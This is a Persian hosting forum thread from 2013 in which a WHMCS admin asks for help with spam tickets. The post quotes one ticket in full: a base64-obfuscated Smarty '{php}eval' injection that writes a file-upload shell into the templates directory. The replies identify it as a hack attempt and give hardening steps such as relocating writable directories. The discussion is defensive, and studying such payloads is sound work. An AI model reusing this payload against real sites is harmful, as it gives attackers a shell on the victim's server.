-
March 18th, 2013, 02:20
#1
(مشکل امنیتی): دریافت تیکت اسپم کد شده!
باسلام. چندبار هست تیکت اسپم که کد php کد شده دارند دریافت میکنم!
متن در عنوان، محتوای تیکت ارسال میشه...
لطفا جهت برخورد جدی با این مشکل و پیشگیری دیگر مشکلات راهنمایی نمایید.
البته کپچای سیستم whmcs فعال هست ولی از آن عبور می کند. چه راه حل هایی هست؟ چه باید کرد؟
کد PHP:
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})
-
تعداد تشکر ها از chn367 به دلیل پست مفید
-
March 18th, 2013 02:20
# ADS
-
March 18th, 2013, 02:35
#2
عضو انجمن
پاسخ : (مشکل امنیتی): دریافت تیکت اسپم کد شده!
دوست عزیز این کد و کد دیگر را در جلوگیری از اسپم ذخیره کنید
-
تعداد تشکر ها از clickchat به دلیل پست مفید
-
March 18th, 2013, 16:30
#3
پاسخ : (مشکل امنیتی): دریافت تیکت اسپم کد شده!
نوشته اصلی توسط
clickchat
دوست عزیز این کد و کد دیگر را در جلوگیری از اسپم ذخیره کنید
متوجه نشدم!
-
تعداد تشکر ها از chn367 به دلیل پست مفید
-
March 24th, 2013, 22:33
#4
پاسخ : (مشکل امنیتی): دریافت تیکت اسپم کد شده!
دوست عزیز با توجه به اطلاعاتم درباره هک وبسایت این کد میاد یه دایرکتوری میسازه و یه باگه برای آپلود شل که فقط تو whmcs این باگ هست ... کاربر رو ban ip کنید چون میخواد هکتون کنه 
-
تعداد تشکر ها از a/\/\ir به دلیل پست مفید
-
March 24th, 2013, 22:46
#5
عضو جدید
پاسخ : (مشکل امنیتی): دریافت تیکت اسپم کد شده!
با سلام
سه پوشه ی اصلی سیستم whmcs به نام attachments و downloads و templates_c همیشه در معرض هک شدن هستن
بدین شکل که هکر میتونه با پیوست شل (چه به صورت بیس 64 و یا آپلود شل با پسوند تصویر) و فراخوانی از دایرکتوری پیش فرض اقدام به نفوذ کنه
برای جلوگیری از این کار باید محل دایرکتوری های ذکر شده رو تغییر بدیم تا هکر نتونه فایلی رو که پیوست کرد فراخوانی کنه
وارد فایل منیجر هاست و بخش روت whmcs خودتون بشید
مثلا /public_html/clients
فایل configuration.php مربوط به whmcs رو ویرایش کنین
دنبال عبارت زیر بگردین و حذفش کنین
قبل از حذف آرایه ی زیر به نکته ای که درباره ی حذف این مورد از فایل کانفیگ درون پست بعد گفته شد مراجعه کنید
$ کد:
کد:
mysql_charset = 'utf8';
حالا templates_compiledir رو پیدا کنین و به مقدار زیر تغییرش بدید
کد:
کد:
$templates_compiledir = "/home/domain/templates_c/";
اینتر کنین تا به خط بعدی برید و کد زیر رو اضافه کنین
کد:
کد:
$downloads_dir = "/home/domain/downloads/"; $attachments_dir = "/home/domain/attachments/";
حالا فایل کانفیگ رو ذخیره کنید و دسترسیش رو روی 600 قرار بدین
درون روت whmcs دایرکتوری های attachments و downloads و templates_c رو انتخاب کنین و از منو بار بالایی روی move کلیک کنین
کادری که باز میشه مسیر زیر درونش نوشته هست که باید این عبارت رو پاک کنید و روی move file کلیک کنید
کد:
دقت داشته باشین با حذف عبارت
کد:
کد:
mysql_charset = 'utf8';
از فایل کانفیگ تنظیمات و اسم هایی که در بخش تنظیمات whmcs قرار دادین از قیبل امضای مدیر و نام انجمن و واحد پولی به ؟؟؟؟؟؟؟؟؟ تبدیل میشه که باید حدود 10 دقیقه وقت بذارین و دوباره اونها رو فارسی کنین و ذخیره
با این کار سایت شما به طور اساسی repare میشه و خیالتون تا آخر فعالیتتون راحت میشه
موفق باشید
حالا دیگه از طریق پیوست فایل هک نمیشید
منبع: whmcs.com
تیکفا هاستینگ | ارائه خدمات هاستینگ | هاست لینوکس
یاهو ای دی: Silver9024
میناب نت
www.minabnet.ir
-
تعداد تشکر ها ازsilver9024 به دلیل پست مفید
پاسخ با نقل قول